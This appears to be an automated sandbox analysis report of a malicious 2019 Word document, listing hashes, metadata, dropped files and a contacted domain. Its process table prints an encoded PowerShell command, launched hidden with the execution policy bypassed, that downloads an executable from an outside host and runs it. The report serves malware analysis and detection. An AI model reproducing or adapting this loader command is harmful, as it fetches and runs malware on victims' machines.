| Field | Value |
|---|---|
| File name | 452449be3e14368f0bf72addba4833a405475249f06d8626baf61eef27662b89.doc |
| Full analysis | https://app.any.run/tasks/dd8a6644-49ad-46e9-bb87-8bc33fe9137a |
| Verdict | Malicious activity |
| Analysis date | May 24, 2019, 02:23:15 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | - |
| Indicators | - |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Neo Jarvis, Template: Normal.dotm, Last Saved By: Neo Jarvis, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Wed May 25 00:04:00 2016, Last Saved Time/Date: Wed May 25 00:04:00 2016, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0 |
| MD5 | 97D84A8BEC18B3D83E7A7CD7E0D7D0CF |
| SHA1 | 3669D3205AD2EB096DD4949FAACCF859A9F3E6B2 |
| SHA256 | 452449BE3E14368F0BF72ADDBA4833A405475249F06D8626BAF61EEF27662B89 |
| SSDEEP | 12288:/YWwZ93gfGgNGq5FQOzSZLfFyNUCBdYTrL2AzoTdJ8xsUeXq:DwnwfG2GkFgLfsXBEHtoTdGqU/ |
| Extension | Detected file type (score) |
|---|---|
| .doc | Microsoft Word document (35.9) |
| .xls | Microsoft Excel sheet (33.7) |
| .doc | Microsoft Word document (old ver.) (21.3) |
| Property | Value |
|---|---|
| Title | - |
| Subject | - |
| Author | Neo Jarvis |
| Keywords | - |
| Comments | - |
| Template | Normal.dotm |
| LastModifiedBy | Neo Jarvis |
| RevisionNumber | 2 |
| Software | Microsoft Office Word |
| TotalEditTime | 1.0 minutes |
| CreateDate | 2016:05:24 23:04:00 |
| ModifyDate | 2016:05:24 23:04:00 |
| Pages | 1 |
| Words | - |
| Characters | 4 |
| Security | None |
| CodePage | Windows Latin 1 (Western European) |
| Company | - |
| Lines | 1 |
| Paragraphs | 1 |
| CharCountWithSpaces | 4 |
| AppVersion | 15 |
| ScaleCrop | No |
| LinksUpToDate | No |
| SharedDoc | No |
| HyperlinksChanged | No |
| TitleOfParts | - |
| HeadingPairs | - |
| CompObjUserTypeLen | 32 |
| CompObjUserType | Microsoft Word 97-2003 Document |
| PID | CMD | Path | Indicators | Parent process | Process details |
|---|---|---|---|---|---|
| 2140 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\452449be3e14368f0bf72addba4833a405475249f06d8626baf61eef27662b89.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 760 | cmd.exe /c powershell.exe -ep bypass -noni -w hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAGEAagBvAHMALgBpAG4ALwAwAHgALwAxAC4AZQB4AGUAJwAsACcAbQBlAHMAcwAuAGUAeABlACcAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnAG0AZQBzAHMALgBlAHgAZQAnAA== | C:\Windows\system32\cmd.exe | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 676 | powershell.exe -ep bypass -noni -w hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAGEAagBvAHMALgBpAG4ALwAwAHgALwAxAC4AZQB4AGUAJwAsACcAbQBlAHMAcwAuAGUAeABlACcAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnAG0AZQBzAHMALgBlAHgAZQAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREE35.tmp.cvr | — | — | — |
| 676 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49IJ4U6R692KC2X7OOQ7.temp | — | — | — |
| 2140 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | C111F99CD469831004E4547E39009B06 | 3479C3CB813B5D1C331B8400A690378D71DF89F98184E62788F05713D903F6AF |
| 676 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
| 2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$2449be3e14368f0bf72addba4833a405475249f06d8626baf61eef27662b89.doc | pgc | 989D399A4AC3CACED36DC775AC8400A9 | 712E1ED7925F06C946FB9077E5F1D9344AF8CDFF21A6D8F86560002F87965036 |
| 676 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11fbe1.TMP | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
| Domain | IP | Reputation |
|---|---|---|
| cajos.in | - | unknown |